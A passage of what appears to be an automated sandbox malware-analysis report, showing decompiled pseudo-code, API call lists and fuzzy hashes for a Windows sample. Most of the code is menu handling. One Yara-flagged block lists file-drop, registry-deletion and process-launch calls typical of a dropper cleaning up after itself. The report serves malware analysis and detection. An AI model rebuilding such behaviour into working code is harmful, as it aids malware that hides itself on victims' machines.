                                                                                                                                                                                                                                                                                          				_t174 = _t173 + 0xc;
                                                                                                                                                                                                                                                                                          				_v440 = 0x10;
                                                                                                                                                                                                                                                                                          				_t161 = _t97[3];
                                                                                                                                                                                                                                                                                          				_t143 =  &_v444;
                                                                                                                                                                                                                                                                                          				SendMessageA( *_t97, 0x41d, _t97[3], _t143);
                                                                                                                                                                                                                                                                                          				_t168 = _v412;
                                                                                                                                                                                                                                                                                          				_t100 = SendMessageA(_t168, 0x418, 0, 0);
                                                                                                                                                                                                                                                                                          				_v280 = _t100;
                                                                                                                                                                                                                                                                                          				if(_t100 <= 0) {
                                                                                                                                                                                                                                                                                          					L26:
                                                                                                                                                                                                                                                                                          					return E001059E6(0, _t139, _v8 ^ _t172, _t161, _t168, _t169);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t103 = SendMessageA(_t168, 0x52e, 0, 0);
                                                                                                                                                                                                                                                                                          					_v284 = _t103;
                                                                                                                                                                                                                                                                                          					 *((char*)(_t169 + 8)) = _t143 & 0xffffff00 | _t103 != 0x00000000;
                                                                                                                                                                                                                                                                                          					_t104 = CreatePopupMenu();
                                                                                                                                                                                                                                                                                          					_t161 =  &_v264;
                                                                                                                                                                                                                                                                                          					_v268 = _t104;
                                                                                                                                                                                                                                                                                          					_t170 = 0;
                                                                                                                                                                                                                                                                                          					_v264.left = 0;
                                                                                                                                                                                                                                                                                          					_v264.top = 0;
                                                                                                                                                                                                                                                                                          					_v264.right = 0;
                                                                                                                                                                                                                                                                                          					_v264.bottom = 0;
                                                                                                                                                                                                                                                                                          					GetClientRect(_t168,  &_v264);
                                                                                                                                                                                                                                                                                          					_v272 = 0;
                                                                                                                                                                                                                                                                                          					if(_v280 > 0) {
                                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                                          							_v232 = 0;
                                                                                                                                                                                                                                                                                          							_v228 = 0;
                                                                                                                                                                                                                                                                                          							_v224 = 0;
                                                                                                                                                                                                                                                                                          							_v220 = 0;
                                                                                                                                                                                                                                                                                          							_v216 = 0;
                                                                                                                                                                                                                                                                                          							SendMessageA(_t168, 0x417, _t170,  &_v232);
                                                                                                                                                                                                                                                                                          							if((_v224 & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          								goto L21;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v248 = 0;
                                                                                                                                                                                                                                                                                          							_v244 = 0;
                                                                                                                                                                                                                                                                                          							_v240 = 0;
                                                                                                                                                                                                                                                                                          							_v236 = 0;
                                                                                                                                                                                                                                                                                          							SendMessageA(_t168, 0x41d, _t170,  &_v248);
                                                                                                                                                                                                                                                                                          							_t117 = _v224;
                                                                                                                                                                                                                                                                                          							_t161 = _v240;
                                                                                                                                                                                                                                                                                          							_t139 = _t117 >> 0x00000002 & 0x00000001;
                                                                                                                                                                                                                                                                                          							if(_v240 > _v264.right) {
                                                                                                                                                                                                                                                                                          								if((_t117 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          									_push(0xc7);
                                                                                                                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                                                                                                                          									_v212 = 0;
                                                                                                                                                                                                                                                                                          									_push( &_v211);
                                                                                                                                                                                                                                                                                          									if(_v276[2] == 0) {
                                                                                                                                                                                                                                                                                          										E00106820();
                                                                                                                                                                                                                                                                                          										_t174 = _t174 + 0xc;
                                                                                                                                                                                                                                                                                          										_v312 = 0;
                                                                                                                                                                                                                                                                                          										_v292 = 0;
                                                                                                                                                                                                                                                                                          										_v288 = 0;
                                                                                                                                                                                                                                                                                          										_v308 = 0;
                                                                                                                                                                                                                                                                                          										_v304 = 0;
                                                                                                                                                                                                                                                                                          										_v300 = 0;
                                                                                                                                                                                                                                                                                          										_v296 = 0;
                                                                                                                                                                                                                                                                                          										_t171 =  &_v212;
                                                                                                                                                                                                                                                                                          										_v316 = 0x20;
                                                                                                                                                                                                                                                                                          										_v312 = 2;
                                                                                                                                                                                                                                                                                          										_v292 = _t171;
                                                                                                                                                                                                                                                                                          										_v288 = 0xc8;
                                                                                                                                                                                                                                                                                          										if(SendMessageA(_t168, 0x441, _v228,  &_v316) == 0xffffffff || lstrlenA(_t171) == 0) {
                                                                                                                                                                                                                                                                                          											_t171 = 0x11293e;
                                                                                                                                                                                                                                                                                          											_t124 = LoadStringA( *0x170c0c, _v228,  &_v212, 0xc8);
                                                                                                                                                                                                                                                                                          											_t152 = 0;
                                                                                                                                                                                                                                                                                          											if(_t124 > 0) {
                                                                                                                                                                                                                                                                                          												while( *((char*)(_t172 + _t152 - 0xd0)) != 0xa) {
                                                                                                                                                                                                                                                                                          													_t152 = _t152 + 1;
                                                                                                                                                                                                                                                                                          													if(_t152 < _t124) {
                                                                                                                                                                                                                                                                                          														continue;
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													goto L20;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												_t171 = _t172 + _t152 - 0xcf;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										L20:
                                                                                                                                                                                                                                                                                          										_t161 = _v228;
                                                                                                                                                                                                                                                                                          										AppendMenuA(_v268, 0 | _t139 == 0x00000000, _v228, _t171);
                                                                                                                                                                                                                                                                                          										_t170 = _v272;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										E00106820();
                                                                                                                                                                                                                                                                                          										E00106820( &_v364, 0, 0x30);
                                                                                                                                                                                                                                                                                          										_t174 = _t174 + 0x18;
                                                                                                                                                                                                                                                                                          										_v364.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          										if(E000F4890(_t139, _t168, _t170) != 0) {
                                                                                                                                                                                                                                                                                          											_v364.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										_v364.fMask = 0x14;
                                                                                                                                                                                                                                                                                          										_v364.dwTypeData =  &_v212;
                                                                                                                                                                                                                                                                                          										_v364.cch = 0xc8;
                                                                                                                                                                                                                                                                                          										GetMenuItemInfoA(_v284, _t170, 1,  &_v364);
                                                                                                                                                                                                                                                                                          										_t161 = _v268;
                                                                                                                                                                                                                                                                                          										AppendMenuA(_v268, 0 | _t139 == 0x00000000 | 0x00000010, _v364.hSubMenu, _v364.dwTypeData);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									if(GetMenuItemCount(_v268) > 0) {
                                                                                                                                                                                                                                                                                          										AppendMenuA(_v268, 0x800, 0, 0);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L21:
                                                                                                                                                                                                                                                                                          							_t170 = _t170 + 1;
                                                                                                                                                                                                                                                                                          							_v272 = _t170;
                                                                                                                                                                                                                                                                                          							if(_t170 < _v280) {
                                                                                                                                                                                                                                                                                          								_t139 = SendMessageA;
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L22;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L22:
                                                                                                                                                                                                                                                                                          					_t169 = _v268;
                                                                                                                                                                                                                                                                                          					if(GetMenuItemCount(_t169) != 0) {
                                                                                                                                                                                                                                                                                          						 *_v276 = _t169;
                                                                                                                                                                                                                                                                                          						return E001059E6(1, _t139, _v8 ^ _t172, _v276, _t168, _t169);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						if(_t169 != 0) {
                                                                                                                                                                                                                                                                                          							DestroyMenu(_t169);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						MessageBeep(0xffffffff);
                                                                                                                                                                                                                                                                                          						goto L26;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





















































                                                                                                                                                                                                                                                                                          0x00100069
                                                                                                                                                                                                                                                                                          0x00100070
                                                                                                                                                                                                                                                                                          0x0010007e
                                                                                                                                                                                                                                                                                          0x00100083
                                                                                                                                                                                                                                                                                          0x00100089
                                                                                                                                                                                                                                                                                          0x00100093
                                                                                                                                                                                                                                                                                          0x00100098
                                                                                                                                                                                                                                                                                          0x0010009b
                                                                                                                                                                                                                                                                                          0x001000a1
                                                                                                                                                                                                                                                                                          0x001000a4
                                                                                                                                                                                                                                                                                          0x001000ae
                                                                                                                                                                                                                                                                                          0x001000b3
                                                                                                                                                                                                                                                                                          0x001000c1
                                                                                                                                                                                                                                                                                          0x001000c3
                                                                                                                                                                                                                                                                                          0x001000d3
                                                                                                                                                                                                                                                                                          0x001000d5
                                                                                                                                                                                                                                                                                          0x001000dd
                                                                                                                                                                                                                                                                                          0x001003f7
                                                                                                                                                                                                                                                                                          0x00100409
                                                                                                                                                                                                                                                                                          0x001000e3
                                                                                                                                                                                                                                                                                          0x001000ed
                                                                                                                                                                                                                                                                                          0x001000f4
                                                                                                                                                                                                                                                                                          0x001000fa
                                                                                                                                                                                                                                                                                          0x001000fd
                                                                                                                                                                                                                                                                                          0x00100103
                                                                                                                                                                                                                                                                                          0x00100109
                                                                                                                                                                                                                                                                                          0x00100112
                                                                                                                                                                                                                                                                                          0x00100115
                                                                                                                                                                                                                                                                                          0x0010011b
                                                                                                                                                                                                                                                                                          0x00100121
                                                                                                                                                                                                                                                                                          0x00100127
                                                                                                                                                                                                                                                                                          0x0010012d
                                                                                                                                                                                                                                                                                          0x00100133
                                                                                                                                                                                                                                                                                          0x0010013f
                                                                                                                                                                                                                                                                                          0x00100156
                                                                                                                                                                                                                                                                                          0x00100158
                                                                                                                                                                                                                                                                                          0x0010015e
                                                                                                                                                                                                                                                                                          0x00100164
                                                                                                                                                                                                                                                                                          0x0010016a
                                                                                                                                                                                                                                                                                          0x00100170
                                                                                                                                                                                                                                                                                          0x00100184
                                                                                                                                                                                                                                                                                          0x0010018d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001001a3
                                                                                                                                                                                                                                                                                          0x001001a9
                                                                                                                                                                                                                                                                                          0x001001af
                                                                                                                                                                                                                                                                                          0x001001b5
                                                                                                                                                                                                                                                                                          0x001001bb
                                                                                                                                                                                                                                                                                          0x001001bd
                                                                                                                                                                                                                                                                                          0x001001c3
                                                                                                                                                                                                                                                                                          0x001001ce
                                                                                                                                                                                                                                                                                          0x001001d7
                                                                                                                                                                                                                                                                                          0x001001e0
                                                                                                                                                                                                                                                                                          0x0010021c
                                                                                                                                                                                                                                                                                          0x00100227
                                                                                                                                                                                                                                                                                          0x00100229
                                                                                                                                                                                                                                                                                          0x00100230
                                                                                                                                                                                                                                                                                          0x00100231
                                                                                                                                                                                                                                                                                          0x001002ce
                                                                                                                                                                                                                                                                                          0x001002d5
                                                                                                                                                                                                                                                                                          0x001002d8
                                                                                                                                                                                                                                                                                          0x001002de
                                                                                                                                                                                                                                                                                          0x001002e4
                                                                                                                                                                                                                                                                                          0x001002f1
                                                                                                                                                                                                                                                                                          0x001002f7
                                                                                                                                                                                                                                                                                          0x001002fd
                                                                                                                                                                                                                                                                                          0x00100303
                                                                                                                                                                                                                                                                                          0x00100310
                                                                                                                                                                                                                                                                                          0x0010031e
                                                                                                                                                                                                                                                                                          0x00100328
                                                                                                                                                                                                                                                                                          0x00100332
                                                                                                                                                                                                                                                                                          0x00100338
                                                                                                                                                                                                                                                                                          0x0010034b
                                                                                                                                                                                                                                                                                          0x00100374
                                                                                                                                                                                                                                                                                          0x00100379
                                                                                                                                                                                                                                                                                          0x0010037f
                                                                                                                                                                                                                                                                                          0x00100383
                                                                                                                                                                                                                                                                                          0x00100385
                                                                                                                                                                                                                                                                                          0x0010038f
                                                                                                                                                                                                                                                                                          0x00100392
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100394
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100392
                                                                                                                                                                                                                                                                                          0x00100396
                                                                                                                                                                                                                                                                                          0x00100396
                                                                                                                                                                                                                                                                                          0x00100383
                                                                                                                                                                                                                                                                                          0x0010039d
                                                                                                                                                                                                                                                                                          0x0010039d
                                                                                                                                                                                                                                                                                          0x001003b4
                                                                                                                                                                                                                                                                                          0x001003ba
                                                                                                                                                                                                                                                                                          0x00100237
                                                                                                                                                                                                                                                                                          0x00100237
                                                                                                                                                                                                                                                                                          0x00100247
                                                                                                                                                                                                                                                                                          0x0010024c
                                                                                                                                                                                                                                                                                          0x0010024f
                                                                                                                                                                                                                                                                                          0x00100260
                                                                                                                                                                                                                                                                                          0x00100262
                                                                                                                                                                                                                                                                                          0x00100262
                                                                                                                                                                                                                                                                                          0x00100283
                                                                                                                                                                                                                                                                                          0x0010028d
                                                                                                                                                                                                                                                                                          0x00100293
                                                                                                                                                                                                                                                                                          0x0010029d
                                                                                                                                                                                                                                                                                          0x001002b7
                                                                                                                                                                                                                                                                                          0x001002c3
                                                                                                                                                                                                                                                                                          0x001002c3
                                                                                                                                                                                                                                                                                          0x001001e2
                                                                                                                                                                                                                                                                                          0x001001f1
                                                                                                                                                                                                                                                                                          0x00100207
                                                                                                                                                                                                                                                                                          0x00100207
                                                                                                                                                                                                                                                                                          0x001001f1
                                                                                                                                                                                                                                                                                          0x001001e0
                                                                                                                                                                                                                                                                                          0x001003c0
                                                                                                                                                                                                                                                                                          0x001003c0
                                                                                                                                                                                                                                                                                          0x001003c1
                                                                                                                                                                                                                                                                                          0x001003cd
                                                                                                                                                                                                                                                                                          0x00100150
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100150
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001003cd
                                                                                                                                                                                                                                                                                          0x00100156
                                                                                                                                                                                                                                                                                          0x001003d3
                                                                                                                                                                                                                                                                                          0x001003d3
                                                                                                                                                                                                                                                                                          0x001003e2
                                                                                                                                                                                                                                                                                          0x00100414
                                                                                                                                                                                                                                                                                          0x00100424
                                                                                                                                                                                                                                                                                          0x001003e4
                                                                                                                                                                                                                                                                                          0x001003e6
                                                                                                                                                                                                                                                                                          0x001003e9
                                                                                                                                                                                                                                                                                          0x001003e9
                                                                                                                                                                                                                                                                                          0x001003f1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001003f1
                                                                                                                                                                                                                                                                                          0x001003e2

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00100093
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000041D,?,00000050), ref: 001000C1
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000418,00000000,00000000), ref: 001000D3
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000052E,00000000,00000000), ref: 001000ED
                                                                                                                                                                                                                                                                                          • CreatePopupMenu.USER32(?,00000000), ref: 001000FD
                                                                                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 0010012D
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000417,00000000,?), ref: 00100184
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000041D,?,?), ref: 001001BB
                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32 ref: 001001E9
                                                                                                                                                                                                                                                                                          • AppendMenuA.USER32 ref: 00100207
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00100237
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00100247
                                                                                                                                                                                                                                                                                          • GetMenuItemInfoA.USER32 ref: 0010029D
                                                                                                                                                                                                                                                                                          • AppendMenuA.USER32 ref: 001002C3
                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32 ref: 001003DA
                                                                                                                                                                                                                                                                                          • DestroyMenu.USER32(?,?,00000000), ref: 001003E9
                                                                                                                                                                                                                                                                                          • MessageBeep.USER32(000000FF), ref: 001003F1
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Menu$Message$Send$Item_memset$AppendCount$BeepClientCreateDestroyInfoPopupRect
                                                                                                                                                                                                                                                                                          • String ID: $,$P
                                                                                                                                                                                                                                                                                          • API String ID: 23422806-2204626854
                                                                                                                                                                                                                                                                                          • Opcode ID: 1e2686130504b7a2fb0637668c077c5d7d5ed33817bb693fce48b3ea021e3fc1
                                                                                                                                                                                                                                                                                          • Instruction ID: 025edd80078304040b671858a8c828e719082abe99983a40c003fb2e5e7d01fb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e2686130504b7a2fb0637668c077c5d7d5ed33817bb693fce48b3ea021e3fc1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65A10870D012299FDB65DB64DD85BEEB7B4BB49700F1081DAE549AB280DBB05EC4CFA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 02528CAB
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 02528CCA
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,0400C650), ref: 02528D20
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,04013CA0), ref: 02528D32
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,0400C654), ref: 02528D44
                                                                                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 02528D56
                                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 02528D7B
                                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(0401436C,00000001), ref: 02528D95
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,0400C690,00000000,00000002,00000000), ref: 02528DE7
                                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,04013CA0), ref: 02528DFD
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 02528E0A
                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(0400C6C0,?,00000104), ref: 02528E36
                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 02528E43
                                                                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,0400C6C8,00000000), ref: 02528E5F
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,0400C6CC), ref: 02528E71
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 02528E8D
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,00000000,00000000), ref: 02528EC0
                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,00000000), ref: 02528ED5
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 02528EE2
                                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02528F53
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02528F64
                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02528F6C
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$lstrcat$Close$CreateHandleNameProcess$AttributesCountDeleteEnvironmentExitModuleOpenSleepTempTerminateThreadTickValueVariableWritelstrlenwnsprintf
                                                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                                                          • API String ID: 1811004299-2746444292
                                                                                                                                                                                                                                                                                          • Opcode ID: 104cbe98931e46d9b7ad1d9ff39cf0a163d7a51c8f8934a7678ac9693553d0d1
                                                                                                                                                                                                                                                                                          • Instruction ID: 30dac3512ab367215cd430b2d8646d7eff433aa2f5532fc4ae2369d804795cf4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 104cbe98931e46d9b7ad1d9ff39cf0a163d7a51c8f8934a7678ac9693553d0d1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C07131B1A45318ABF724DFA0DC49FEA7778FB45704F044698B209B61C1DB785A84CF64
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                                                                                                                                                                          			E000F3340(CHAR** __ecx, CHAR* __edx, intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                                                                                          				char _v53;
                                                                                                                                                                                                                                                                                          				char _v54;
                                                                                                                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                                                                                                                          				char _v61;
                                                                                                                                                                                                                                                                                          				CHAR** _v68;
                                                                                                                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                                                                                                                          				char* _v80;
                                                                                                                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v88;
                                                                                                                                                                                                                                                                                          				intOrPtr _v92;
                                                                                                                                                                                                                                                                                          				char _v96;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                                                                                                          				signed int _t62;
                                                                                                                                                                                                                                                                                          				signed int _t63;
                                                                                                                                                                                                                                                                                          				intOrPtr _t65;
                                                                                                                                                                                                                                                                                          				char* _t68;
                                                                                                                                                                                                                                                                                          				char _t69;
                                                                                                                                                                                                                                                                                          				CHAR* _t74;
                                                                                                                                                                                                                                                                                          				intOrPtr _t77;
                                                                                                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                                                                                                          				CHAR** _t83;
                                                                                                                                                                                                                                                                                          				CHAR* _t84;
                                                                                                                                                                                                                                                                                          				CHAR* _t85;
                                                                                                                                                                                                                                                                                          				char _t87;
                                                                                                                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                                                                                                                          				CHAR* _t96;
                                                                                                                                                                                                                                                                                          				CHAR* _t97;
                                                                                                                                                                                                                                                                                          				CHAR* _t98;
                                                                                                                                                                                                                                                                                          				CHAR** _t102;
                                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _t105;
                                                                                                                                                                                                                                                                                          				CHAR* _t120;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t126;
                                                                                                                                                                                                                                                                                          				void* _t127;
                                                                                                                                                                                                                                                                                          				CHAR* _t128;
                                                                                                                                                                                                                                                                                          				CHAR* _t130;
                                                                                                                                                                                                                                                                                          				intOrPtr _t133;
                                                                                                                                                                                                                                                                                          				CHAR* _t135;
                                                                                                                                                                                                                                                                                          				void* _t136;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t140;
                                                                                                                                                                                                                                                                                          				CHAR** _t146;
                                                                                                                                                                                                                                                                                          				signed int _t147;
                                                                                                                                                                                                                                                                                          				void* _t148;
                                                                                                                                                                                                                                                                                          				void* _t149;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t123 = __edx;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010FAC8);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t149 = _t148 - 0x50;
                                                                                                                                                                                                                                                                                          				_t62 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t63 = _t62 ^ _t147;
                                                                                                                                                                                                                                                                                          				_v20 = _t63;
                                                                                                                                                                                                                                                                                          				_push(_t63);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t126 = _a4;
                                                                                                                                                                                                                                                                                          				_t135 = __edx;
                                                                                                                                                                                                                                                                                          				_t102 = __ecx;
                                                                                                                                                                                                                                                                                          				_v68 = __ecx;
                                                                                                                                                                                                                                                                                          				_v88 = _t126;
                                                                                                                                                                                                                                                                                          				if(__edx == 0 || _t126 == 0) {
                                                                                                                                                                                                                                                                                          					_t65 = 0x80004003;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					 *_t126 = 0;
                                                                                                                                                                                                                                                                                          					_t68 = lstrlenA(__edx) + _t67;
                                                                                                                                                                                                                                                                                          					if(_t68 < 0x64) {
                                                                                                                                                                                                                                                                                          						_t68 = 0x3e8;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v84 = 0;
                                                                                                                                                                                                                                                                                          					_v80 = _t68;
                                                                                                                                                                                                                                                                                          					if(0 > 0 || _t68 > 0xffffffff) {
                                                                                                                                                                                                                                                                                          						_t68 = 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__imp__CoTaskMemAlloc(_t68);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v76 = _t68;
                                                                                                                                                                                                                                                                                          					if(_t68 != 0) {
                                                                                                                                                                                                                                                                                          						 *_t68 = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          					if(_t68 != 0) {
                                                                                                                                                                                                                                                                                          						_t69 =  *0x171969; // 0x0
                                                                                                                                                                                                                                                                                          						 *_t102 = _t135;
                                                                                                                                                                                                                                                                                          						_v61 = _t69;
                                                                                                                                                                                                                                                                                          						_v60 = 0;
                                                                                                                                                                                                                                                                                          						_v72 = 0;
                                                                                                                                                                                                                                                                                          						_v54 = 0;
                                                                                                                                                                                                                                                                                          						_v53 = 0;
                                                                                                                                                                                                                                                                                          						if( *_t135 == 0) {
                                                                                                                                                                                                                                                                                          							L52:
                                                                                                                                                                                                                                                                                          							_v76 = 0;
                                                                                                                                                                                                                                                                                          							 *_t126 = _v76;
                                                                                                                                                                                                                                                                                          							__imp__CoTaskMemFree(_v76);
                                                                                                                                                                                                                                                                                          							_t65 = _v60;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								if(_v61 != 1) {
                                                                                                                                                                                                                                                                                          									goto L36;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									if(_v72 != 0) {
                                                                                                                                                                                                                                                                                          										L19:
                                                                                                                                                                                                                                                                                          										goto L20;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t95 = E001060C5( *_t102, "HKCR");
                                                                                                                                                                                                                                                                                          										_t149 = _t149 + 8;
                                                                                                                                                                                                                                                                                          										if(_t95 == 0) {
                                                                                                                                                                                                                                                                                          											goto L19;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t120 =  *_t102;
                                                                                                                                                                                                                                                                                          											if(_t95 != _t120) {
                                                                                                                                                                                                                                                                                          												goto L19;
                                                                                                                                                                                                                                                                                          											} else {
